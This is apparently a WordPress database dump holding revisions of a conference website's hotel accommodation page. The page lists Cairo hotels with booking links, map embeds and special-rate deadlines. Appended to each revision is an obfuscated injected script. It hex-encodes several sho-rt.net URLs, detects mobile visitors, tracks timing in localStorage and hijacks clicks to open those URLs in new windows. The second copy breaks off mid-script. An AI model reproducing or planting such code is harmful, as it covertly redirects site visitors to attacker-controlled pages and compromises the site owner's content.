primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Steigenberger Hotel El Tahrir\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" hover_btn_align=\"center\" use_custom_fonts_primary_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.steigenberger.com%2Fen%2Fhotels%2Fall-hotels%2Fegypt%2Fcairo%2Fsteigenberger-el-tahrir-cairo|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fsteigenberger-hotel-el-tahrir%2F\"]</p>\n<ul>\n<li><a href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"4788\" primary_title=\"Grand Nile Tower Hotel\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Grand Nile Tower Hotel\" hover_title_use_theme_fonts=\"yes\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" use_custom_fonts_primary_title=\"true\" use_custom_fonts_hover_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.grandniletower.com%2F|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fgrand-nile-tower-hotel%2F|title:Grand%20Nile%20Tower%20Hotel\"]</p>\n<ul>\n<li>https://www.grandniletower.com/</li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h5></h5>\n<p>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2690\" primary_title=\"Novotel Cairo El Borg\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Novotel Cairo El Borg\" hover_title_use_theme_fonts=\"yes\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" use_custom_fonts_primary_title=\"true\" use_custom_fonts_hover_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fnovotelborg.com-cairo.com%2F|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fnovotel-cairo-el-borg%2F\"]</p>\n<ul>\n<li><a href=\"https://novotelborg.com-cairo.com/\" target=\"_blank\" rel=\"noopener\">https://novotelborg.com-cairo.com/</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<ul>\n<li>\n<h4>Special Rate Booking is Opened Now</h4>\n<h5>Deadline for the Special Rates is August 15, 2023</h5>\n</li>\n</ul>\n<p>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2689\" primary_title=\"Kempinski Nile Hotel Garden City Cairo\" primary_title_font_container=\"color:%230000ed\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Kempinski Nile Hotel Garden City Cairo\" el_width=\"50\" use_custom_fonts_primary_title=\"true\" primary_title_link=\"url:http%3A%2F%2F%3Cli%3E%3Ca%20href%3D%22https%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%22%20target%3D%22_blank%22%20%3Ehttps%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%3C%2Fa%3E%3C%2Fli%3E|title:Hotel%20Accommodation|target:_blank\"]</p>\n<ul>\n<li><a href=\"https://www.kempinski.com/en/cairo/nile-hotel/\" target=\"_blank\" rel=\"noopener\">https://www.kempinski.com/en/cairo/nile-hotel/</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.9374842495713!2d31.228220615528013!3d30.03865132580035!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840cdb8f441cb%3A0x59cf96cf4cfe8978!2sKempinski%20Nile%20Hotel%20Garden%20City%20Cairo!5e0!3m2!1sen!2seg!4v1663341682148!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][dt_media_gallery_carousel image_border_radius=\"0px\" slides_on_wide_desk=\"1\" slides_on_desk=\"1\" slides_on_lapt=\"1\" slides_on_h_tabs=\"1\" slides_on_v_tabs=\"1\" autoplay=\"y\" autoplay_speed=\"3000\" project_icon_color=\"#ffffff\" project_icon_border_width=\"0px\" arrow_bg_width=\"36x\" arrow_border_width=\"0px\" r_arrow_icon_paddings=\"0px 0px 0px 0px\" r_arrow_v_offset=\"0px\" l_arrow_icon_paddings=\"0px 0px 0px 0px\" l_arrow_v_offset=\"0px\" include=\"4833,4791\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Hotel Accommodation','','inherit','closed','closed','','2685-revision-v1','','','2023-06-25 18:58:24','2023-06-25 18:58:24','',2685,'https://gsw2023.com/?p=4838',0,'revision','',0),
(4839,4,'2023-06-25 18:59:52','2023-06-25 18:59:52','<p>[vc_row][vc_column][vc_hoverbox image=\"2683\" primary_title=\"INTERCONTINENTAL CAIRO SEMIRAMIS\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"INTERCONTINENTAL CAIRO SEMIRAMIS\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" hover_btn_align=\"center\" use_custom_fonts_primary_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fgb%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%23scmisc%3Dnav_hoteldetail_ic|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">https://www.ihg.com/intercontinental/hotels</a></span></span></h6>\n</li>\n</ul>\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic</a></span></span></h6>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d6907.530703931726!2d31.232628000000002!3d30.043589!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x0%3A0xaf4aee1a5598653d!2sInterContinental%20Cairo%20Semiramis%2C%20an%20IHG%20Hotel!5e0!3m2!1sen!2seg!4v1674631098317!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h4>Special Rate Booking is Opened Now</h4>\n<h5></h5>\n<h5>Deadline for the Special Rates is August 10, 2023</h5>\n<p>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><a>Other </a><a>Hotel Accommodation</a></h1>\n<p style=\"text-align: center;\"><a> Nearby the Conference Venue</a></p>\n<p>[/vc_column_text][vc_hoverbox image=\"2688\" primary_title=\"Steigenberger Hotel El Tahrir\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Steigenberger Hotel El Tahrir\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" hover_btn_align=\"center\" use_custom_fonts_primary_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.steigenberger.com%2Fen%2Fhotels%2Fall-hotels%2Fegypt%2Fcairo%2Fsteigenberger-el-tahrir-cairo|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fsteigenberger-hotel-el-tahrir%2F\"]</p>\n<ul>\n<li><a href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"4788\" primary_title=\"Grand Nile Tower Hotel\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Grand Nile Tower Hotel\" hover_title_use_theme_fonts=\"yes\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" use_custom_fonts_primary_title=\"true\" use_custom_fonts_hover_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.grandniletower.com%2F|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fgrand-nile-tower-hotel%2F|title:Grand%20Nile%20Tower%20Hotel\"]</p>\n<ul>\n<li>https://www.grandniletower.com/</li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h5></h5>\n<p>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2690\" primary_title=\"Novotel Cairo El Borg\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Novotel Cairo El Borg\" hover_title_use_theme_fonts=\"yes\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" use_custom_fonts_primary_title=\"true\" use_custom_fonts_hover_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fnovotelborg.com-cairo.com%2F|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fnovotel-cairo-el-borg%2F\"]</p>\n<ul>\n<li><a href=\"https://novotelborg.com-cairo.com/\" target=\"_blank\" rel=\"noopener\">https://novotelborg.com-cairo.com/</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<ul>\n<li>\n<h4>Special Rate Booking is Opened Now</h4>\n<h5>Deadline for the Special Rates is August 15, 2023</h5>\n</li>\n</ul>\n<p>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2689\" primary_title=\"Kempinski Nile Hotel Garden City Cairo\" primary_title_font_container=\"color:%230000ed\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Kempinski Nile Hotel Garden City Cairo\" el_width=\"50\" use_custom_fonts_primary_title=\"true\" primary_title_link=\"url:http%3A%2F%2F%3Cli%3E%3Ca%20href%3D%22https%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%22%20target%3D%22_blank%22%20%3Ehttps%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%3C%2Fa%3E%3C%2Fli%3E|title:Hotel%20Accommodation|target:_blank\"]</p>\n<ul>\n<li><a href=\"https://www.kempinski.com/en/cairo/nile-hotel/\" target=\"_blank\" rel=\"noopener\">https://www.kempinski.com/en/cairo/nile-hotel/</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.9374842495713!2d31.228220615528013!3d30.03865132580035!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840cdb8f441cb%3A0x59cf96cf4cfe8978!2sKempinski%20Nile%20Hotel%20Garden%20City%20Cairo!5e0!3m2!1sen!2seg!4v1663341682148!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][dt_media_gallery_carousel image_border_radius=\"0px\" slides_on_wide_desk=\"1\" slides_on_desk=\"1\" slides_on_lapt=\"1\" slides_on_h_tabs=\"1\" slides_on_v_tabs=\"1\" autoplay=\"y\" autoplay_speed=\"3000\" project_icon_color=\"#ffffff\" project_icon_border_width=\"0px\" arrow_bg_width=\"36x\" arrow_border_width=\"0px\" r_arrow_icon_paddings=\"0px 0px 0px 0px\" r_arrow_v_offset=\"0px\" l_arrow_icon_paddings=\"0px 0px 0px 0px\" l_arrow_v_offset=\"0px\" show_bullets=\"y\" bullets_h_offset=\"0px\" include=\"4833,4791\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'